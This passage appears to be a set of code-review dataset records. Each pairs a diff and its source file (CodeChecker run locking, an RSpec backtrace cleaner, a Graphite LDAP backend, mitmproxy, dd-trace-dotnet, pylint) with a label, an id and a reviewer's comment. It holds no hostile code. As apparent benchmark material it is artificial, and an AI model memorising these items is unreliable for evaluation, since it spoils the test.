.format(name, username, when)) raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.DATABASE, "The run named '{0}' is being stored into by {1}. If the " "other store operation has failed, this lock will expire " "at '{2}'.".format(name, username, when)) # At any rate, if the lock has been created or updated, commit it # into the database. try: session.commit() except (sqlalchemy.exc.IntegrityError, sqlalchemy.orm.exc.StaleDataError): # The commit of this lock can fail. # # In case two store ops attempt to lock the same run name at the # same time, committing the lock in the transaction that commits # later will result in an IntegrityError due to the primary key # constraint. # # In case two store ops attempt to lock the same run name with # reuse and one of the operation hangs long enough before COMMIT # so that the other operation commits and thus removes the lock # record, StaleDataError is raised. In this case, also consider # the run locked, as the data changed while the transaction was # waiting, as another run wholly completed. LOG.info("Run '{0}' got locked while current transaction " "tried to acquire a lock. Considering run as locked." .format(name)) raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.DATABASE, "The run named '{0}' is being stored into by another " "user.".format(name)) @staticmethod @exc_to_thrift_reqfail def __free_run_lock(session, name): """ Remove the lock from the database for the given run name. """ # Using with_for_update() here so the database (in case it supports # this operation) locks the lock record's row from any other access. run_lock = session.query(RunLock) \ .filter(RunLock.name == name) \ .with_for_update(nowait=True).one() session.delete(run_lock) session.commit() def __check_run_limit(self, run_name): """ Checks the maximum allowed of uploadable runs for the current product. 
""" max_run_count = self.__manager.get_max_run_count() with DBSession(self.__config_database) as session: product = session.query(Product).get(self.__product.id) if product.run_limit: max_run_count = product.run_limit # Session that handles constraints on the run. with DBSession(self.__Session) as session: if max_run_count: LOG.debug("Check the maximum number of allowed runs which is " "{0}".format(max_run_count)) run = session.query(Run) \ .filter(Run.name == run_name) \ .one_or_none() # If max_run_count is not set in the config file, it will allow # the user to upload unlimited runs. run_count = session.query(Run.id).count() # If we are not updating a run or the run count is reached the # limit it will throw an exception. if not run and run_count >= max_run_count: remove_run_count = run_count - max_run_count + 1 raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.GENERAL, 'You reached the maximum number of allowed runs ' '({0}/{1})! Please remove at least {2} run(s) before ' 'you try it again.'.format(run_count, max_run_count, remove_run_count)) @exc_to_thrift_reqfail @timeit def massStoreRun(self, name, tag, version, b64zip, force, trim_path_prefixes): self.__require_store() user = self.__auth_session.user if self.__auth_session else None # Check constraints of the run. 
self.__check_run_limit(name) with DBSession(self.__Session) as session: ThriftRequestHandler.__store_run_lock(session, name, user) context = generic_package_context.get_context() wrong_src_code_comments = [] try: with util.TemporaryDirectory() as zip_dir: unzip(b64zip, zip_dir) LOG.debug("Using unzipped folder '{0}'".format(zip_dir)) source_root = os.path.join(zip_dir, 'root') report_dir = os.path.join(zip_dir, 'reports') metadata_file = os.path.join(report_dir, 'metadata.json') skip_file = os.path.join(report_dir, 'skip_file') content_hash_file = os.path.join(zip_dir, 'content_hashes.json') skip_handler = skiplist_handler.SkipListHandler() if os.path.exists(skip_file): LOG.debug("Pocessing skip file %s", skip_file) try: with open(skip_file) as sf: skip_handler = \ skiplist_handler.SkipListHandler(sf.read()) except (IOError, OSError) as err: LOG.error("Failed to open skip file") LOG.error(err) filename_to_hash = util.load_json_or_empty(content_hash_file, {}) file_path_to_id = self.__store_source_files(source_root, filename_to_hash, trim_path_prefixes) run_history_time = datetime.now() check_commands, check_durations, cc_version, statistics = \ store_handler.metadata_info(metadata_file) if len(check_commands) == 0: command = ' '.join(sys.argv) elif len(check_commands) == 1: command = ' '.join(check_commands[0]) else: command = "multiple analyze calls: " + \ '; '.join([' '.join(com) for com in check_commands]) durations = 0 if len(check_durations) > 0: # Round the duration to seconds. durations = int(sum(check_durations)) # This session's transaction buffer stores the actual run data # into the database. with DBSession(self.__Session) as session: # Load the lock record for "FOR UPDATE" so that the # transaction that handles the run's store operations # has a lock on the database row itself. 
run_lock = session.query(RunLock) \ .filter(RunLock.name == name) \ .with_for_update(nowait=True).one() # Do not remove this seemingly dummy print, we need to make # sure that the execution of the SQL statement is not # optimised away and the fetched row is not garbage # collected. LOG.debug("Storing into run '{0}' locked at '{1}'." .format(name, run_lock.locked_at)) # Actual store operation begins here. run_id = store_handler.addCheckerRun(session, command, name, tag, user if user else 'Anonymous', run_history_time, version, force, cc_version, statistics) self.__store_reports(session, report_dir, source_root, run_id, file_path_to_id, run_history_time, context.severity_map, wrong_src_code_comments, skip_handler) store_handler.setRunDuration(session, run_id, durations) store_handler.finishCheckerRun(session, run_id) session.commit() return run_id finally: # In any case if the "try" block's execution began, a run lock must # exist, which can now be removed, as storage either completed # successfully, or failed in a detectable manner. # (If the failure is undetectable, the coded grace period expiry # of the lock will allow further store operations to the given # run name.) with DBSession(self.__Session) as session: ThriftRequestHandler.__free_run_lock(session, name) if len(wrong_src_code_comments): raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.SOURCE_FILE, "Multiple source code comment can be found with the same " "checker name for same bug!", wrong_src_code_comments) @exc_to_thrift_reqfail @timeit def allowsStoringAnalysisStatistics(self): self.__require_store() return True if self.__manager.get_analysis_statistics_dir() else False @exc_to_thrift_reqfail @timeit def getAnalysisStatisticsLimits(self): self.__require_store() cfg = dict() # Get the limit of failure zip size. 
failure_zip_size = self.__manager.get_failure_zip_size() if failure_zip_size: cfg[ttypes.StoreLimitKind.FAILURE_ZIP_SIZE] = failure_zip_size # Get the limit of compilation database size. compilation_database_size = \ self.__manager.get_compilation_database_size() if compilation_database_size: cfg[ttypes.StoreLimitKind.COMPILATION_DATABASE_SIZE] = \ compilation_database_size return cfg @exc_to_thrift_reqfail @timeit def storeAnalysisStatistics(self, run_name, b64zip): self.__require_store() report_dir_store = self.__manager.get_analysis_statistics_dir() if report_dir_store: try: product_dir = os.path.join(report_dir_store, self.__product.endpoint) # Create report store directory. if not os.path.exists(product_dir): os.makedirs(product_dir) # Removes and replaces special characters in the run name. run_name = slugify(run_name) run_zip_file = os.path.join(product_dir, run_name + '.zip') with open(run_zip_file, 'w') as run_zip: run_zip.write(zlib.decompress( base64.b64decode(b64zip))) return True except Exception as ex: LOG.error(str(ex)) return False return False
1
9,789
Shouldn't we use store a message which indicates that there was no available checker command? By the way how is it possible that metadata.json doesn't contain the checker command? Maybe this was the case in the earlier versions?
Ericsson-codechecker
c
@@ -32,6 +32,10 @@ module RSpec @exclusion_patterns = true_or_false ? [] : DEFAULT_EXCLUSION_PATTERNS.dup end + def full_backtrace + @exclusion_patterns.empty? + end + private def matches_an_exclusion_pattern?(line)
1
module RSpec module Core class BacktraceCleaner DEFAULT_EXCLUSION_PATTERNS = [ /\/lib\d*\/ruby\//, /org\/jruby\//, /bin\//, %r|/gems/|, /spec\/spec_helper\.rb/, /lib\/rspec\/(core|expectations|matchers|mocks)/ ] attr_accessor :inclusion_patterns attr_accessor :exclusion_patterns def initialize(inclusion_patterns=nil, exclusion_patterns=DEFAULT_EXCLUSION_PATTERNS.dup) @exclusion_patterns = exclusion_patterns if inclusion_patterns.nil? @inclusion_patterns = (matches_an_exclusion_pattern? Dir.getwd) ? [Regexp.new(Dir.getwd)] : [] else @inclusion_patterns = inclusion_patterns end end def exclude?(line) @inclusion_patterns.none? {|p| line =~ p} and matches_an_exclusion_pattern?(line) end def full_backtrace=(true_or_false) @exclusion_patterns = true_or_false ? [] : DEFAULT_EXCLUSION_PATTERNS.dup end private def matches_an_exclusion_pattern?(line) @exclusion_patterns.any? {|p| line =~ p} end end end end
1
8,747
Given that this is a boolean predicate, maybe it should be `full_backtrace?`.
rspec-rspec-core
rb
@@ -12,7 +12,9 @@ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.""" -import ldap, traceback +import traceback + +import ldap from django.conf import settings from django.contrib.auth.models import User
1
"""Copyright 2008 Orbitz WorldWide Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.""" import ldap, traceback from django.conf import settings from django.contrib.auth.models import User class LDAPBackend: def authenticate(self, username=None, password=None): if settings.LDAP_USER_DN_TEMPLATE is not None: settings.LDAP_BASE_USER = settings.LDAP_USER_DN_TEMPLATE % {'username': username} settings.LDAP_BASE_PASS = password try: conn = ldap.initialize(settings.LDAP_URI) conn.protocol_version = ldap.VERSION3 if settings.LDAP_USE_TLS: conn.start_tls_s() conn.simple_bind_s( settings.LDAP_BASE_USER, settings.LDAP_BASE_PASS ) except ldap.LDAPError: traceback.print_exc() return None scope = ldap.SCOPE_SUBTREE filter = settings.LDAP_USER_QUERY % username returnFields = ['dn','mail'] try: resultID = conn.search( settings.LDAP_SEARCH_BASE, scope, filter, returnFields ) resultType, resultData = conn.result( resultID, 0 ) if len(resultData) != 1: # User does not exist return None userDN = resultData[0][0] try: userMail = resultData[0][1]['mail'][0].decode("utf-8") except Exception: userMail = "Unknown" conn.simple_bind_s(userDN,password) try: user = User.objects.get(username=username) except Exception: # First time login, not in django's database # To prevent login from django db user randomPasswd = User.objects.make_random_password(length=16) user = User.objects.create_user(username, userMail, randomPasswd) user.save() return user except ldap.INVALID_CREDENTIALS: traceback.print_exc() return None def 
get_user(self,user_id): try: return User.objects.get(pk=user_id) except User.DoesNotExist: return None
1
12,769
Just curious why the blank line here?
graphite-project-graphite-web
py
@@ -1,3 +1,3 @@ from __future__ import (absolute_import, print_function, division) -from netlib.version import * +from mitmproxy.version import *
1
from __future__ import (absolute_import, print_function, division) from netlib.version import *
1
11,420
I like the idea, but we don't want a dependency on mitmproxy in pathod.
mitmproxy-mitmproxy
py
@@ -49,6 +49,16 @@ namespace Datadog.Trace private TimeSpan Elapsed => StopwatchHelpers.GetElapsed(Stopwatch.GetTimestamp() - _timestamp); + /// <summary> + /// Gets or sets a collection of propagated internal Datadog tags, + /// formatted as "key1=value1,key2=value2". + /// </summary> + /// <remarks> + /// We're keeping this as the string representation to avoid having to parse. + /// For now, it's relatively easy to append new values when needed. + /// </remarks> + public string DatadogTags { get; set; } + public void AddSpan(Span span) { lock (this)
1
// <copyright file="TraceContext.cs" company="Datadog"> // Unless explicitly stated otherwise all files in this repository are licensed under the Apache 2 License. // This product includes software developed at Datadog (https://www.datadoghq.com/). Copyright 2017 Datadog, Inc. // </copyright> using System; using System.Diagnostics; using Datadog.Trace.ClrProfiler; using Datadog.Trace.Logging; using Datadog.Trace.PlatformHelpers; using Datadog.Trace.Tagging; using Datadog.Trace.Util; namespace Datadog.Trace { internal class TraceContext { private static readonly IDatadogLogger Log = DatadogLogging.GetLoggerFor<TraceContext>(); private readonly DateTimeOffset _utcStart = DateTimeOffset.UtcNow; private readonly long _timestamp = Stopwatch.GetTimestamp(); private ArrayBuilder<Span> _spans; private int _openSpans; private SamplingPriority? _samplingPriority; public TraceContext(IDatadogTracer tracer) { Tracer = tracer; } public Span RootSpan { get; private set; } public DateTimeOffset UtcNow => _utcStart.Add(Elapsed); public IDatadogTracer Tracer { get; } /// <summary> /// Gets or sets sampling priority. /// </summary> public SamplingPriority? SamplingPriority { get => _samplingPriority; set { SetSamplingPriority(value); } } private TimeSpan Elapsed => StopwatchHelpers.GetElapsed(Stopwatch.GetTimestamp() - _timestamp); public void AddSpan(Span span) { lock (this) { if (RootSpan == null) { // first span added is the root span RootSpan = span; DecorateRootSpan(span); if (_samplingPriority == null) { if (span.Context.Parent is SpanContext context && context.SamplingPriority != null) { // this is a root span created from a propagated context that contains a sampling priority. // lock sampling priority when a span is started from a propagated trace. _samplingPriority = context.SamplingPriority; } else { // this is a local root span (i.e. not propagated). 
// determine an initial sampling priority for this trace, but don't lock it yet _samplingPriority = Tracer.Sampler?.GetSamplingPriority(RootSpan); } } } _openSpans++; } } public void CloseSpan(Span span) { bool ShouldTriggerPartialFlush() => Tracer.Settings.Exporter.PartialFlushEnabled && _spans.Count >= Tracer.Settings.Exporter.PartialFlushMinSpans; if (span == RootSpan) { if (_samplingPriority == null) { Log.Warning("Cannot set span metric for sampling priority before it has been set."); } else { SetSamplingPriority(span, _samplingPriority.Value); } } ArraySegment<Span> spansToWrite = default; bool shouldPropagateMetadata = false; lock (this) { _spans.Add(span); _openSpans--; if (_openSpans == 0) { spansToWrite = _spans.GetArray(); _spans = default; } else if (ShouldTriggerPartialFlush()) { Log.Debug<ulong, ulong, int>( "Closing span {spanId} triggered a partial flush of trace {traceId} with {spanCount} pending spans", span.SpanId, span.TraceId, _spans.Count); // We may not be sending the root span, so we need to propagate the metadata to other spans of the partial trace // There's no point in doing that inside of the lock, so we set a flag for later shouldPropagateMetadata = true; spansToWrite = _spans.GetArray(); // Making the assumption that, if the number of closed spans was big enough to trigger partial flush, // the number of remaining spans is probably big as well. // Therefore, we bypass the resize logic and immediately allocate the array to its maximum size _spans = new ArrayBuilder<Span>(spansToWrite.Count); } } if (shouldPropagateMetadata) { PropagateMetadata(spansToWrite); } if (spansToWrite.Count > 0) { Tracer.Write(spansToWrite); } } public void SetSamplingPriority(SamplingPriority? 
samplingPriority, bool notifyDistributedTracer = true) { _samplingPriority = samplingPriority; if (notifyDistributedTracer) { DistributedTracer.Instance.SetSamplingPriority(samplingPriority); } } public TimeSpan ElapsedSince(DateTimeOffset date) { return Elapsed + (_utcStart - date); } private static void SetSamplingPriority(Span span, SamplingPriority samplingPriority) { if (span.Tags is CommonTags tags) { tags.SamplingPriority = (int)samplingPriority; } else { span.Tags.SetMetric(Metrics.SamplingPriority, (int)samplingPriority); } } private void PropagateMetadata(ArraySegment<Span> spans) { // The agent looks for the sampling priority on the first span that has no parent // Finding those spans is not trivial, so instead we apply the priority to every span var samplingPriority = _samplingPriority; if (samplingPriority == null) { return; } // Using a for loop to avoid the boxing allocation on ArraySegment.GetEnumerator for (int i = 0; i < spans.Count; i++) { SetSamplingPriority(spans.Array[i + spans.Offset], samplingPriority.Value); } } private void DecorateRootSpan(Span span) { if (AzureAppServices.Metadata.IsRelevant) { span.SetTag(Tags.AzureAppServicesSiteName, AzureAppServices.Metadata.SiteName); span.SetTag(Tags.AzureAppServicesSiteKind, AzureAppServices.Metadata.SiteKind); span.SetTag(Tags.AzureAppServicesSiteType, AzureAppServices.Metadata.SiteType); span.SetTag(Tags.AzureAppServicesResourceGroup, AzureAppServices.Metadata.ResourceGroup); span.SetTag(Tags.AzureAppServicesSubscriptionId, AzureAppServices.Metadata.SubscriptionId); span.SetTag(Tags.AzureAppServicesResourceId, AzureAppServices.Metadata.ResourceId); span.SetTag(Tags.AzureAppServicesInstanceId, AzureAppServices.Metadata.InstanceId); span.SetTag(Tags.AzureAppServicesInstanceName, AzureAppServices.Metadata.InstanceName); span.SetTag(Tags.AzureAppServicesOperatingSystem, AzureAppServices.Metadata.OperatingSystem); span.SetTag(Tags.AzureAppServicesRuntime, AzureAppServices.Metadata.Runtime); 
span.SetTag(Tags.AzureAppServicesExtensionVersion, AzureAppServices.Metadata.SiteExtensionVersion); } } } }
1
25,136
Why not adding this to the interface and keep passing the interface (as the interface is internal I don't get why you're not adding it there)
DataDog-dd-trace-dotnet
.cs
@@ -70,6 +70,7 @@ from typing import Pattern, Tuple import astroid from astroid import nodes +from astroid.const import PY310_PLUS from pylint.checkers import BaseChecker, utils from pylint.checkers.utils import (
1
# Copyright (c) 2006-2014 LOGILAB S.A. (Paris, FRANCE) <[email protected]> # Copyright (c) 2009 James Lingard <[email protected]> # Copyright (c) 2012-2014 Google, Inc. # Copyright (c) 2014-2020 Claudiu Popa <[email protected]> # Copyright (c) 2014 David Shea <[email protected]> # Copyright (c) 2014 Steven Myint <[email protected]> # Copyright (c) 2014 Holger Peters <[email protected]> # Copyright (c) 2014 Arun Persaud <[email protected]> # Copyright (c) 2015 Anentropic <[email protected]> # Copyright (c) 2015 Dmitry Pribysh <[email protected]> # Copyright (c) 2015 Rene Zhang <[email protected]> # Copyright (c) 2015 Radu Ciorba <[email protected]> # Copyright (c) 2015 Ionel Cristian Maries <[email protected]> # Copyright (c) 2016, 2019 Ashley Whetter <[email protected]> # Copyright (c) 2016 Alexander Todorov <[email protected]> # Copyright (c) 2016 Jürgen Hermann <[email protected]> # Copyright (c) 2016 Jakub Wilk <[email protected]> # Copyright (c) 2016 Filipe Brandenburger <[email protected]> # Copyright (c) 2017-2018, 2020 hippo91 <[email protected]> # Copyright (c) 2017 Łukasz Rogalski <[email protected]> # Copyright (c) 2017 Derek Gustafson <[email protected]> # Copyright (c) 2017 Ville Skyttä <[email protected]> # Copyright (c) 2018-2019 Nick Drozd <[email protected]> # Copyright (c) 2018 Pablo Galindo <[email protected]> # Copyright (c) 2018 Jim Robertson <[email protected]> # Copyright (c) 2018 Lucas Cimon <[email protected]> # Copyright (c) 2018 Mike Frysinger <[email protected]> # Copyright (c) 2018 Ben Green <[email protected]> # Copyright (c) 2018 Konstantin <[email protected]> # Copyright (c) 2018 Justin Li <[email protected]> # Copyright (c) 2018 Bryce Guinta <[email protected]> # Copyright (c) 2019-2021 Pierre Sassoulas <[email protected]> # Copyright (c) 2019 Andy Palmer <[email protected]> # Copyright (c) 2019 mattlbeck <[email protected]> # Copyright (c) 2019 Martin Vielsmaier <[email protected]> # Copyright (c) 2019 Santiago Castro <[email 
protected]> # Copyright (c) 2019 yory8 <[email protected]> # Copyright (c) 2019 Federico Bond <[email protected]> # Copyright (c) 2019 Pascal Corpet <[email protected]> # Copyright (c) 2020 Peter Kolbus <[email protected]> # Copyright (c) 2020 Julien Palard <[email protected]> # Copyright (c) 2020 Ram Rachum <[email protected]> # Copyright (c) 2020 Anthony Sottile <[email protected]> # Copyright (c) 2020 Anubhav <[email protected]> # Copyright (c) 2021 doranid <[email protected]> # Copyright (c) 2021 Marc Mueller <[email protected]> # Copyright (c) 2021 yushao2 <[email protected]> # Copyright (c) 2021 Andrew Haigh <[email protected]> # Copyright (c) 2021 Jens H. Nielsen <[email protected]> # Copyright (c) 2021 Ikraduya Edian <[email protected]> # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html # For details: https://github.com/PyCQA/pylint/blob/main/LICENSE """try to find more bugs in the code using astroid inference capabilities """ import fnmatch import heapq import itertools import operator import re import shlex import sys import types from collections import deque from collections.abc import Sequence from functools import singledispatch from typing import Pattern, Tuple import astroid from astroid import nodes from pylint.checkers import BaseChecker, utils from pylint.checkers.utils import ( check_messages, decorated_with, decorated_with_property, has_known_bases, is_builtin_object, is_classdef_type, is_comprehension, is_inside_abstract_class, is_iterable, is_mapping, is_overload_stub, is_postponed_evaluation_enabled, is_super, node_ignores_exception, safe_infer, supports_delitem, supports_getitem, supports_membership_test, supports_setitem, ) from pylint.constants import BUILTINS, PY310_PLUS from pylint.interfaces import INFERENCE, IAstroidChecker from pylint.utils import get_global_option STR_FORMAT = {"%s.str.format" % BUILTINS} ASYNCIO_COROUTINE = "asyncio.coroutines.coroutine" BUILTIN_TUPLE = "builtins.tuple" 
TYPE_ANNOTATION_NODES_TYPES = ( nodes.AnnAssign, nodes.Arguments, nodes.FunctionDef, ) def _unflatten(iterable): for index, elem in enumerate(iterable): if isinstance(elem, Sequence) and not isinstance(elem, str): yield from _unflatten(elem) elif elem and not index: # We're interested only in the first element. yield elem def _flatten_container(iterable): # Flatten nested containers into a single iterable for item in iterable: if isinstance(item, (list, tuple, types.GeneratorType)): yield from _flatten_container(item) else: yield item def _is_owner_ignored(owner, attrname, ignored_classes, ignored_modules): """Check if the given owner should be ignored This will verify if the owner's module is in *ignored_modules* or the owner's module fully qualified name is in *ignored_modules* or if the *ignored_modules* contains a pattern which catches the fully qualified name of the module. Also, similar checks are done for the owner itself, if its name matches any name from the *ignored_classes* or if its qualified name can be found in *ignored_classes*. """ ignored_modules = set(ignored_modules) module_name = owner.root().name module_qname = owner.root().qname() for ignore in ignored_modules: # Try to match the module name / fully qualified name directly if module_qname in ignored_modules or module_name in ignored_modules: return True # Try to see if the ignores pattern match against the module name. if fnmatch.fnmatch(module_qname, ignore): return True # Otherwise we might have a root module name being ignored, # and the qualified owner has more levels of depth. parts = deque(module_name.split(".")) current_module = "" while parts: part = parts.popleft() if not current_module: current_module = part else: current_module += f".{part}" if current_module in ignored_modules: return True # Match against ignored classes. 
ignored_classes = set(ignored_classes) if hasattr(owner, "qname"): qname = owner.qname() else: qname = "" return any(ignore in (attrname, qname) for ignore in ignored_classes) @singledispatch def _node_names(node): if not hasattr(node, "locals"): return [] return node.locals.keys() @_node_names.register(nodes.ClassDef) @_node_names.register(astroid.Instance) def _(node): values = itertools.chain(node.instance_attrs.keys(), node.locals.keys()) try: mro = node.mro()[1:] except (NotImplementedError, TypeError, astroid.MroError): mro = node.ancestors() other_values = [value for cls in mro for value in _node_names(cls)] return itertools.chain(values, other_values) def _string_distance(seq1, seq2): seq2_length = len(seq2) row = list(range(1, seq2_length + 1)) + [0] for seq1_index, seq1_char in enumerate(seq1): last_row = row row = [0] * seq2_length + [seq1_index + 1] for seq2_index, seq2_char in enumerate(seq2): row[seq2_index] = min( last_row[seq2_index] + 1, row[seq2_index - 1] + 1, last_row[seq2_index - 1] + (seq1_char != seq2_char), ) return row[seq2_length - 1] def _similar_names(owner, attrname, distance_threshold, max_choices): """Given an owner and a name, try to find similar names The similar names are searched given a distance metric and only a given number of choices will be returned. """ possible_names = [] names = _node_names(owner) for name in names: if name == attrname: continue distance = _string_distance(attrname, name) if distance <= distance_threshold: possible_names.append((name, distance)) # Now get back the values with a minimum, up to the given # limit or choices. picked = [ name for (name, _) in heapq.nsmallest( max_choices, possible_names, key=operator.itemgetter(1) ) ] return sorted(picked) def _missing_member_hint(owner, attrname, distance_threshold, max_choices): names = _similar_names(owner, attrname, distance_threshold, max_choices) if not names: # No similar name. 
return "" names = [repr(name) for name in names] if len(names) == 1: names = ", ".join(names) else: names = "one of {} or {}".format(", ".join(names[:-1]), names[-1]) return f"; maybe {names}?" MSGS = { "E1101": ( "%s %r has no %r member%s", "no-member", "Used when a variable is accessed for an unexistent member.", {"old_names": [("E1103", "maybe-no-member")]}, ), "I1101": ( "%s %r has no %r member%s, but source is unavailable. Consider " "adding this module to extension-pkg-allow-list if you want " "to perform analysis based on run-time introspection of living objects.", "c-extension-no-member", "Used when a variable is accessed for non-existent member of C " "extension. Due to unavailability of source static analysis is impossible, " "but it may be performed by introspecting living objects in run-time.", ), "E1102": ( "%s is not callable", "not-callable", "Used when an object being called has been inferred to a non " "callable object.", ), "E1111": ( "Assigning result of a function call, where the function has no return", "assignment-from-no-return", "Used when an assignment is done on a function call but the " "inferred function doesn't return anything.", ), "E1120": ( "No value for argument %s in %s call", "no-value-for-parameter", "Used when a function call passes too few arguments.", ), "E1121": ( "Too many positional arguments for %s call", "too-many-function-args", "Used when a function call passes too many positional arguments.", ), "E1123": ( "Unexpected keyword argument %r in %s call", "unexpected-keyword-arg", "Used when a function call passes a keyword argument that " "doesn't correspond to one of the function's parameter names.", ), "E1124": ( "Argument %r passed by position and keyword in %s call", "redundant-keyword-arg", "Used when a function call would result in assigning multiple " "values to a function parameter, one value from a positional " "argument and one from a keyword argument.", ), "E1125": ( "Missing mandatory keyword argument %r in %s 
call", "missing-kwoa", ( "Used when a function call does not pass a mandatory" " keyword-only argument." ), ), "E1126": ( "Sequence index is not an int, slice, or instance with __index__", "invalid-sequence-index", "Used when a sequence type is indexed with an invalid type. " "Valid types are ints, slices, and objects with an __index__ " "method.", ), "E1127": ( "Slice index is not an int, None, or instance with __index__", "invalid-slice-index", "Used when a slice index is not an integer, None, or an object " "with an __index__ method.", ), "E1128": ( "Assigning result of a function call, where the function returns None", "assignment-from-none", "Used when an assignment is done on a function call but the " "inferred function returns nothing but None.", {"old_names": [("W1111", "old-assignment-from-none")]}, ), "E1129": ( "Context manager '%s' doesn't implement __enter__ and __exit__.", "not-context-manager", "Used when an instance in a with statement doesn't implement " "the context manager protocol(__enter__/__exit__).", ), "E1130": ( "%s", "invalid-unary-operand-type", "Emitted when a unary operand is used on an object which does not " "support this type of operation.", ), "E1131": ( "%s", "unsupported-binary-operation", "Emitted when a binary arithmetic operation between two " "operands is not supported.", ), "E1132": ( "Got multiple values for keyword argument %r in function call", "repeated-keyword", "Emitted when a function call got multiple values for a keyword.", ), "E1135": ( "Value '%s' doesn't support membership test", "unsupported-membership-test", "Emitted when an instance in membership test expression doesn't " "implement membership protocol (__contains__/__iter__/__getitem__).", ), "E1136": ( "Value '%s' is unsubscriptable", "unsubscriptable-object", "Emitted when a subscripted value doesn't support subscription " "(i.e. 
doesn't define __getitem__ method or __class_getitem__ for a class).", ), "E1137": ( "%r does not support item assignment", "unsupported-assignment-operation", "Emitted when an object does not support item assignment " "(i.e. doesn't define __setitem__ method).", ), "E1138": ( "%r does not support item deletion", "unsupported-delete-operation", "Emitted when an object does not support item deletion " "(i.e. doesn't define __delitem__ method).", ), "E1139": ( "Invalid metaclass %r used", "invalid-metaclass", "Emitted whenever we can detect that a class is using, " "as a metaclass, something which might be invalid for using as " "a metaclass.", ), "E1140": ( "Dict key is unhashable", "unhashable-dict-key", "Emitted when a dict key is not hashable " "(i.e. doesn't define __hash__ method).", ), "E1141": ( "Unpacking a dictionary in iteration without calling .items()", "dict-iter-missing-items", "Emitted when trying to iterate through a dict without calling .items()", ), "E1142": ( "'await' should be used within an async function", "await-outside-async", "Emitted when await is used outside an async function.", ), "W1113": ( "Keyword argument before variable positional arguments list " "in the definition of %s function", "keyword-arg-before-vararg", "When defining a keyword argument before variable positional arguments, one can " "end up in having multiple values passed for the aforementioned parameter in " "case the method is called with keyword arguments.", ), "W1114": ( "Positional arguments appear to be out of order", "arguments-out-of-order", "Emitted when the caller's argument names fully match the parameter " "names in the function signature but do not have the same order.", ), "W1115": ( "Non-string value assigned to __name__", "non-str-assignment-to-dunder-name", "Emitted when a non-string vaue is assigned to __name__", ), "W1116": ( "Second argument of isinstance is not a type", "isinstance-second-argument-not-valid-type", "Emitted when the second argument of 
an isinstance call is not a type.", ), } # builtin sequence types in Python 2 and 3. SEQUENCE_TYPES = { "str", "unicode", "list", "tuple", "bytearray", "xrange", "range", "bytes", "memoryview", } def _emit_no_member(node, owner, owner_name, ignored_mixins=True, ignored_none=True): """Try to see if no-member should be emitted for the given owner. The following cases are ignored: * the owner is a function and it has decorators. * the owner is an instance and it has __getattr__, __getattribute__ implemented * the module is explicitly ignored from no-member checks * the owner is a class and the name can be found in its metaclass. * The access node is protected by an except handler, which handles AttributeError, Exception or bare except. * The node is guarded behind and `IF` or `IFExp` node """ # pylint: disable=too-many-return-statements if node_ignores_exception(node, AttributeError): return False if ignored_none and isinstance(owner, nodes.Const) and owner.value is None: return False if is_super(owner) or getattr(owner, "type", None) == "metaclass": return False if owner_name and ignored_mixins and owner_name[-5:].lower() == "mixin": return False if isinstance(owner, nodes.FunctionDef) and ( owner.decorators or owner.is_abstract() ): return False if isinstance(owner, (astroid.Instance, nodes.ClassDef)): if owner.has_dynamic_getattr(): # Issue #2565: Don't ignore enums, as they have a `__getattr__` but it's not # invoked at this point. try: metaclass = owner.metaclass() except astroid.MroError: return False if metaclass: # Renamed in Python 3.10 to `EnumType` return metaclass.qname() in ("enum.EnumMeta", "enum.EnumType") return False if not has_known_bases(owner): return False # Exclude typed annotations, since these might actually exist # at some point during the runtime of the program. if utils.is_attribute_typed_annotation(owner, node.attrname): return False if isinstance(owner, astroid.objects.Super): # Verify if we are dealing with an invalid Super object. 
# If it is invalid, then there's no point in checking that # it has the required attribute. Also, don't fail if the # MRO is invalid. try: owner.super_mro() except (astroid.MroError, astroid.SuperError): return False if not all(has_known_bases(base) for base in owner.type.mro()): return False if isinstance(owner, nodes.Module): try: owner.getattr("__getattr__") return False except astroid.NotFoundError: pass if owner_name and node.attrname.startswith("_" + owner_name): # Test if an attribute has been mangled ('private' attribute) unmangled_name = node.attrname.split("_" + owner_name)[-1] try: if owner.getattr(unmangled_name, context=None) is not None: return False except astroid.NotFoundError: return True if ( owner.parent and isinstance(owner.parent, nodes.ClassDef) and owner.parent.name == "EnumMeta" and owner_name == "__members__" and node.attrname in ["items", "values", "keys"] ): # Avoid false positive on Enum.__members__.{items(), values, keys} # See https://github.com/PyCQA/pylint/issues/4123 return False # Don't emit no-member if guarded behind `IF` or `IFExp` # * Walk up recursively until if statement is found. # * Check if condition can be inferred as `Const`, # would evaluate as `False`, # and wheater the node is part of the `body`. # * Continue checking until scope of node is reached. scope: nodes.NodeNG = node.scope() node_origin: nodes.NodeNG = node parent: nodes.NodeNG = node.parent while parent != scope: if isinstance(parent, (nodes.If, nodes.IfExp)): inferred = safe_infer(parent.test) if ( # pylint: disable=too-many-boolean-expressions isinstance(inferred, nodes.Const) and inferred.bool_value() is False and ( isinstance(parent, nodes.If) and node_origin in parent.body or isinstance(parent, nodes.IfExp) and node_origin == parent.body ) ): return False node_origin, parent = parent, parent.parent return True def _determine_callable(callable_obj): # Ordering is important, since BoundMethod is a subclass of UnboundMethod, # and Function inherits Lambda. 
